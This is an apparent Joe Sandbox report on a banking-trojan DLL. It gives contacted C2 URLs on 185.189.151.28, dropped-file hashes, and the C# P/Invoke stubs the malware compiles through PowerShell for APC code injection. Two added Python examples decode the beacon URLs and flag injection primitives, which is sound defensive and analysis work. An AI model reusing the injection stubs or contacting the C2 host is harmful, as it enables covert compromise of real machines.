Dropped files: No Antivirus matches

Unpacked PE files:
  Source | Detection | Scanner | Label
  3.2.rundll32.exe.1060000.0.unpack | 100% | Avira | HEUR/AGEN.1245293

Domains: No Antivirus matches

URLs:
  Source | Detection | Scanner | Label
  http://185.189.151.28/ | 0% | Virustotal | -
  http://185.189.151.28/ | 0% | Avira URL Cloud | safe
  http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe
  http://185.189.151.28/drew/A_2Fp | 0% | Avira URL Cloud | safe
  http://185.189.151.28/drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLE | 0% | Avira URL Cloud | safe
  http://185.189.151.28/drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQQf/vX4xXJ2IWlh9/BWCOo52VZG1/qFF3rGEbDGBwji/AFMqmR1WMmM5K0LIMoI8g/D8c5DrZSEGvsAUch/2HdMta1B0ffeRMZ/k3cTTdUk82uBVmy7RF/Rr_2FL2he/DujtrSekUisPa3nAIzJG/cz1155F97esi6v8egB5/_2FIb4A5CDY4_2BdVWbog2/rBYVbP7pL/9UBLZ.jlk | 0% | Avira URL Cloud | safe
  http://constitution.org/usdeclar.txt | 0% | URL Reputation | safe
  http://185.189.151.28/ws | 0% | Avira URL Cloud | safe
  http://185.189.151.28/drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQ | 0% | Avira URL Cloud | safe
  http://crl.microsof | 0% | URL Reputation | safe
  http://185.189.151.28/drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLEhKaYvKzYG/62F8wcJNe79PrlqCY04/xwdKlEWPSs9w4mnPcT_2Ft/CBh9Jka_2BBO_/2FnUOsl_/2FeukB5Oo3R7waflgs2APeC/CflAOA3Y4e/fxy536Bj3MO1PfKKA/SIX3IKWM1adU/v_2FKt6MdMc/MqBgUjh6Lil97f/dDK979RFebXcHjW4yVEWU/DckDOUNWU_2FdK/Emn7xfA9.jlk | 0% | Avira URL Cloud | safe
  http://185.189.151.28/drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umz | 0% | Avira URL Cloud | safe
  http://constitution.org/usdeclar.txtC: | 0% | URL Reputation | safe
Contacted Domains: No contacted domains info

Contacted URLs:
  Name | Malicious | Antivirus Detection | Reputation
  http://185.189.151.28/drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQQf/vX4xXJ2IWlh9/BWCOo52VZG1/qFF3rGEbDGBwji/AFMqmR1WMmM5K0LIMoI8g/D8c5DrZSEGvsAUch/2HdMta1B0ffeRMZ/k3cTTdUk82uBVmy7RF/Rr_2FL2he/DujtrSekUisPa3nAIzJG/cz1155F97esi6v8egB5/_2FIb4A5CDY4_2BdVWbog2/rBYVbP7pL/9UBLZ.jlk | true | Avira URL Cloud: safe | unknown
  http://185.189.151.28/drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLEhKaYvKzYG/62F8wcJNe79PrlqCY04/xwdKlEWPSs9w4mnPcT_2Ft/CBh9Jka_2BBO_/2FnUOsl_/2FeukB5Oo3R7waflgs2APeC/CflAOA3Y4e/fxy536Bj3MO1PfKKA/SIX3IKWM1adU/v_2FKt6MdMc/MqBgUjh6Lil97f/dDK979RFebXcHjW4yVEWU/DckDOUNWU_2FdK/Emn7xfA9.jlk | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries:

  http://185.189.151.28/
    Source: rundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Antivirus detection: 0%, Virustotal; Avira URL Cloud: safe
    Reputation: unknown

  http://https://file://USER.ID%lu.exe/upd
    Source: rundll32.exe, 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Antivirus detection: Avira URL Cloud: safe
    Reputation: low

  http://185.189.151.28/drew/A_2Fp
    Source: rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Antivirus detection: Avira URL Cloud: safe
    Reputation: unknown

  http://185.189.151.28/drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLE
    Source: rundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517515689.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642709206.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Antivirus detection: Avira URL Cloud: safe
    Reputation: unknown

  http://constitution.org/usdeclar.txt
    Source: rundll32.exe, 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Antivirus detection: URL Reputation: safe
    Reputation: unknown

  http://185.189.151.28/ws
    Source: rundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Antivirus detection: Avira URL Cloud: safe
    Reputation: unknown

  http://185.189.151.28/drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQ
    Source: rundll32.exe, 00000003.00000002.642559499.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Antivirus detection: Avira URL Cloud: safe
    Reputation: unknown

  http://crl.microsof
    Source: powershell.exe, 0000000A.00000003.604947338.00000227AB271000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Antivirus detection: URL Reputation: safe
    Reputation: unknown

  http://185.189.151.28/drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umz
    Source: rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Antivirus detection: Avira URL Cloud: safe
    Reputation: unknown

  http://constitution.org/usdeclar.txtC:
    Source: rundll32.exe, 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Antivirus detection: URL Reputation: safe
    Reputation: unknown
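The two contacted URLs share the shape that public ISFB/Gozi analyses describe for its beacons: a configured prefix ("/drew/" here), a long run of pseudo-directories made of base64-looking text with "_2F" and "_2B" in place of the base64 characters '/' and '+', and a random extension (".jlk"). The block below is an added example, not part of the report and not Joe Sandbox or Ursnif code; the encoding rules it undoes (URL-encode the base64, rewrite '%' as '_', sprinkle in '/' separators, append an extension) are an assumption taken from those public analyses, not something this report states. The payload stays encrypted with a key from the sample's configuration, which the report does not reproduce, so only the ciphertext envelope and its size are recovered.

```python
"""Recover the encrypted beacon blob carried in ISFB/Gozi-style C2 URLs.

Added example, not part of the Joe Sandbox report. Assumption (from public
ISFB write-ups, not from this report): after the URI prefix the path is base64
text that was URL-encoded with '%' rewritten as '_' ("_2F" = '/', "_2B" = '+'),
cut into pseudo-directories by extra '/' characters, and given a random
extension. Only the ciphertext envelope is recovered; the key is not here.
"""
import base64
import binascii
import re
from urllib.parse import urlparse

# The two "Contacted URLs" from the report above.
SAMPLE_URLS = [
    "http://185.189.151.28/drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQQf/vX4xXJ2IWlh9/BWCOo52VZG1/qFF3rGEbDGBwji/AFMqmR1WMmM5K0LIMoI8g/D8c5DrZSEGvsAUch/2HdMta1B0ffeRMZ/k3cTTdUk82uBVmy7RF/Rr_2FL2he/DujtrSekUisPa3nAIzJG/cz1155F97esi6v8egB5/_2FIb4A5CDY4_2BdVWbog2/rBYVbP7pL/9UBLZ.jlk",
    "http://185.189.151.28/drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLEhKaYvKzYG/62F8wcJNe79PrlqCY04/xwdKlEWPSs9w4mnPcT_2Ft/CBh9Jka_2BBO_/2FnUOsl_/2FeukB5Oo3R7waflgs2APeC/CflAOA3Y4e/fxy536Bj3MO1PfKKA/SIX3IKWM1adU/v_2FKt6MdMc/MqBgUjh6Lil97f/dDK979RFebXcHjW4yVEWU/DckDOUNWU_2FdK/Emn7xfA9.jlk",
]

_UNDERSCORE_ESCAPE = re.compile(r"_([0-9A-Fa-f]{2})")   # "_2F" -> "/", "_2B" -> "+"
_B64_ALPHABET = re.compile(r"[A-Za-z0-9+/]*")


def recover_base64(url: str, prefix: str = "/drew/") -> str:
    """Undo the path obfuscation and return the bare base64 string."""
    path = urlparse(url).path
    if not path.startswith(prefix):
        raise ValueError(f"path does not start with {prefix!r}: {path}")
    body = path[len(prefix):]
    # base64 never contains '.', so the first '.' starts the fake extension.
    body = body.split(".", 1)[0]
    # Remove the inserted separators FIRST: an escape can be split across one
    # (the second URL contains "BO_/2FnU", i.e. "_2F" with a '/' inside it).
    compact = body.replace("/", "")
    b64 = _UNDERSCORE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), compact)
    if not _B64_ALPHABET.fullmatch(b64):
        raise ValueError("unexpected characters after un-escaping: " + b64)
    return b64


def extract_blob(url: str, prefix: str = "/drew/") -> bytes:
    """Return the raw (still encrypted) bytes; restores base64 padding."""
    b64 = recover_base64(url, prefix)
    padded = b64 + "=" * (-len(b64) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"not valid base64 after un-escaping: {exc}") from exc


def is_beacon_url(url: str, prefix: str = "/drew/") -> bool:
    """True if the URL decodes cleanly under the assumed scheme."""
    try:
        extract_blob(url, prefix)
        return True
    except ValueError:
        return False


def describe(url: str, prefix: str = "/drew/") -> dict:
    """Summarise one beacon URL for an analyst's notes."""
    parsed = urlparse(url)
    body = parsed.path[len(prefix):]
    b64 = recover_base64(url, prefix)
    blob = extract_blob(url, prefix)
    return {
        "host": parsed.hostname,
        "extension": body.rsplit(".", 1)[1] if "." in body else "",
        "segments": body.count("/") + 1,
        "escapes": len(_UNDERSCORE_ESCAPE.findall(body.replace("/", ""))),
        "base64_chars": len(b64),
        "cipher_bytes": len(blob),
    }


if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(describe(u))
```

Both URLs come out as exactly 256 base64 characters, i.e. 192 bytes of ciphertext each, which is the kind of consistency that supports the decoding assumption: random path text would almost never normalise to a multiple of four characters twice. The recovered bytes are what the analyst would feed to the sample's configured cipher key once that key is extracted from the binary.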
Contacted IPs

Public:
  IP | Domain | Country | ASN | ASN Name | Malicious
  185.189.151.28 | unknown | Switzerland | 51395 | AS-SOFTPLUSCH | true

Private:
  IP
  192.168.2.1
                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:620333
Start date and time: 04/05/2022 16:26:19 (2022-05-04 16:26:19 +02:00)
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 12m 2s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:tIJVb0BvkI.dll
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 24
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.bank.troj.evad.winDLL@24/15@0/2
                      EGA Information:
                      • Successful, ratio: 50%
                      HDC Information:
                      • Successful, ratio: 85.8% (good quality ratio 82.2%)
                      • Quality average: 82.1%
                      • Quality standard deviation: 27%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32
                      • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                      • TCP Packets have been reduced to 100
                      • Excluded IPs from analysis (whitelisted): 13.107.42.16
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, arc.msn.com, config.edge.skype.com
                      • Execution Graph export aborted for target mshta.exe, PID 6756 because there are no executed function
• Not all processes were analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
16:28:24 | API Interceptor | 15x Sleep call for process: powershell.exe modified
                      No context
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):11606
                      Entropy (8bit):4.883977562702998
                      Encrypted:false
                      SSDEEP:192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ
                      MD5:243581397F734487BD471C04FB57EA44
                      SHA1:38CB3BAC7CDC67CB3B246B32117C2C6188243E77
                      SHA-256:7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90
                      SHA-512:1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A
                      Malicious:false
                      Preview:PSMODULECACHE.....7.t8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider...........e...[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text
                      Category:dropped
                      Size (bytes):403
                      Entropy (8bit):5.058106976759534
                      Encrypted:false
                      SSDEEP:6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
                      MD5:99BD08BC1F0AEA085539BBC7D61FA79D
                      SHA1:F2CA39B111C367D147609FCD6C811837BE2CE9F3
                      SHA-256:8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
                      SHA-512:E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
                      Malicious:false
                      Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class bju. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);.. }..}.
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):371
                      Entropy (8bit):5.243693039966474
                      Encrypted:false
                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fqjzxs7+AEszI923fqe:p37Lvkmb6KzWWZE2r
                      MD5:2ED921F1330955F6AFDBB78FA7EAF8F4
                      SHA1:DB24B6EE559C4B25D8F92DD574D95BA7354D9E3D
                      SHA-256:2049BE5CF51E976F56978650CDF497A93641D8DC063B73D195CAF84D280AF0A1
                      SHA-512:34AC6D80B7658F3787B740881DB9CC46724FC2586F8ED2B076E68C59F827C1C96C0E8BC0E0BF7CEE0CDB7C29815BF42F32FCBAC3CD395839E6B70EEE230F42B1
                      Malicious:false
                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.0.cs"
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):3584
                      Entropy (8bit):2.6162239107618914
                      Encrypted:false
                      SSDEEP:24:etGS/8OmU0t3lm85xWAseO4zkQ64pfUPtkZfqmPVUWI+ycuZhNyoakST9PNnq:6dXQ3r5xNOnQfUuJqmd31ulna3rq
                      MD5:89A7D7E72EE4D68C3E0A507D7151F2CE
                      SHA1:89E10E370DE870B07976D508379CA908642B2D98
                      SHA-256:4A403CD94F5DFDDF2C7813781CC570EB1D59EE10DD89774CC30B6AF3BA694B81
                      SHA-512:CAAB903ABFEB4B382EA85182B4820A82A1A6D70C5A1D1F697BFD31487290354F08005E7DBEF03C3FABBF9757D261EE6235F490E05824BADFCF04B45A47344A14
                      Malicious:false
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&.sb...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....p.....w.....~...............a. ...a...!.a.%...a.......*.....3.0.....6.......C.......V...........
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):868
                      Entropy (8bit):5.339579234164359
                      Encrypted:false
                      SSDEEP:12:xKIR37Lvkmb6KzWWZE2qKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KznE2qKaM5DqBVKVrdFAMBJTH
                      MD5:7A6F4E96A8D3B3A4C8AF231DDFFDE508
                      SHA1:7EAE899EE47B06783142610DF27ACDEB0F686EC3
                      SHA-256:00DF50BF3A6286D2D1FC5FA1951B22E04370B59802960AFC5BA77EBF21A6647C
                      SHA-512:E75F43E8905AA37E43BDD7D976BB7A84CE521097FA58FEB2CF77436A3688C77F98B3AC12A5D7244DECCE53849D7CD1F25B53E899748E83B00A0DCBECAB3FD014
                      Malicious:false
                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.109354189483703
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryZWoak7YnqqqW9PN5Dlq5J:+RI+ycuZhNyoakST9PNnqX
                      MD5:D66AF6FAC9C9D4F1F78AE3A5DC5349E5
                      SHA1:121B0B2A4DC1FC76073D0B9E738768EFF1FD34C9
                      SHA-256:89C80B6EA10BBDEC2FDF0A878C09D3261BD42E09764A38D7F155B4E89894A06C
                      SHA-512:E63B88E36F531BDCDBAE8816D7ED486CD6F6D6F9E307EE228599A213E022423900AC82CB4FAEAB3E30CB0BCBC077C3C9CFADD53FEF5C7D7CEF60E09011DAE54D
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...2.t.b.3.q.i.q.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...2.t.b.3.q.i.q.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text
                      Category:dropped
                      Size (bytes):392
                      Entropy (8bit):4.988829579018284
                      Encrypted:false
                      SSDEEP:6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
                      MD5:80545CB568082AB66554E902D9291782
                      SHA1:D013E59DC494D017F0E790D63CEB397583DCB36B
                      SHA-256:E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
                      SHA-512:C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
                      Malicious:false
                      Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class buvbcy. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint jujqjjcr,uint fvu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);.. }..}.
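The two C# previews above are the stubs PowerShell's Add-Type writes to %TEMP%\<random>\<random>.0.cs before handing them to csc.exe (the matching .cmdline files and compiled .dll files are listed alongside). Taken together their imports are the usual APC self-injection sequence: VirtualAlloc for the buffer, OpenThread/GetCurrentThreadId for a handle to the calling thread, QueueUserAPC to point an APC at the buffer, and SleepEx to enter the alertable wait in which the APC runs. The block below is an added example, not part of the report and not Joe Sandbox or Ursnif code: it parses such stubs, unions the imports across several compiled units (this sample split its declarations over two csc.exe runs, so either file alone looks harmless) and flags the primitive. The two sources are the report's previews with line breaks restored; the capability grouping, the "generated-looking identifier" heuristic and the hand-written BENIGN_STUB contrast are this example's own.

```python
"""Triage PowerShell Add-Type P/Invoke stubs for code-injection primitives.

Added example, not part of the Joe Sandbox report. SRC_A and SRC_B are the two
"*.0.cs" previews from the report with newlines restored; the capability table
and heuristics below are this example's own, not something the report states.
"""
import re

SRC_A = """using System;
using System.Runtime.InteropServices;

namespace W32
{
    public class bju
    {
        [DllImport("kernel32")]
public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);
[DllImport("kernel32")]
public static extern IntPtr GetCurrentThreadId();
[DllImport("kernel32")]
public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);
    }
}
"""

SRC_B = """using System;
using System.Runtime.InteropServices;

namespace W32
{
    public class buvbcy
    {
        [DllImport("kernel32")]
public static extern IntPtr GetCurrentProcess();
[DllImport("kernel32")]
public static extern void SleepEx(uint jujqjjcr,uint fvu);
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);
    }
}
"""

# Constructed hand-written stub for contrast (not from the report).
BENIGN_STUB = """public class Native {
    [DllImport("user32.dll")]
    public static extern int MessageBox(IntPtr hWnd, string text, string caption, uint type);
}
"""

PINVOKE = re.compile(
    r'\[DllImport\("(?P<lib>[^"]+)"[^\]]*\]\s*'
    r'public\s+static\s+extern\s+(?P<ret>[\w.]+)\s+(?P<name>\w+)\s*\((?P<params>[^)]*)\)')

# Which Win32 calls supply which step of a user-mode injection chain (our grouping).
CAPABILITIES = {
    "allocate":       {"VirtualAlloc", "VirtualAllocEx", "NtAllocateVirtualMemory"},
    "write":          {"WriteProcessMemory", "NtWriteVirtualMemory", "RtlMoveMemory"},
    "thread_handle":  {"OpenThread", "GetCurrentThread", "GetCurrentThreadId"},
    "queue_apc":      {"QueueUserAPC", "NtQueueApcThread"},
    "alertable_wait": {"SleepEx", "WaitForSingleObjectEx", "NtTestAlert"},
    "remote_thread":  {"CreateRemoteThread", "NtCreateThreadEx", "RtlCreateUserThread"},
}
# An APC queued to the calling thread only runs once that thread enters an
# alertable wait, so an alertable-wait import completes the primitive.
APC_SELF_INJECTION = {"allocate", "thread_handle", "queue_apc", "alertable_wait"}


def parse_pinvokes(source: str) -> list:
    """Return one dict per [DllImport] declaration: lib, ret, name, params."""
    out = []
    for m in PINVOKE.finditer(source):
        params = [p.strip() for p in m.group("params").split(",") if p.strip()]
        out.append({"lib": m.group("lib").lower(), "ret": m.group("ret"),
                    "name": m.group("name"), "params": params})
    return out


def looks_generated(source: str) -> bool:
    """Heuristic: class and parameter names are meaningless lowercase runs
    (bju, wqyemwbu, ...) rather than hand-written hWnd/dwSize-style names."""
    cls = re.search(r"class\s+(\w+)", source)
    param_names = [p.split()[-1] for d in parse_pinvokes(source) for p in d["params"]]
    names = ([cls.group(1)] if cls else []) + param_names
    return bool(names) and all(re.fullmatch(r"[a-z]{3,}", n) for n in names)


def triage(sources) -> dict:
    """Union the imports of several compiled units and report which injection
    steps they cover; a single unit can look harmless on its own."""
    imports = {d["name"] for s in sources for d in parse_pinvokes(s)}
    caps = {cap for cap, names in CAPABILITIES.items() if imports & names}
    return {
        "imports": sorted(imports),
        "capabilities": sorted(caps),
        "apc_self_injection": APC_SELF_INJECTION <= caps,
        "generated_stubs": all(looks_generated(s) for s in sources),
    }


if __name__ == "__main__":
    print(triage([SRC_A]))
    print(triage([SRC_A, SRC_B]))
```

Hunting note: on a live host the equivalent evidence is the pair of csc.exe launches under powershell.exe with /out: pointing into %TEMP%, plus the leftover .0.cs, .cmdline and .dll files; the stubs are short enough to be collected and run through a parser like this one before the compiled assembly is even examined.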
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):371
                      Entropy (8bit):5.229282846983885
                      Encrypted:false
                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fp+zxs7+AEszI923fR:p37Lvkmb6KzsWZE2J
                      MD5:8790EA5EBD20665A121C0467D12D0F98
                      SHA1:560171D6E50CA52CB0F3179EE861D66954DFEE36
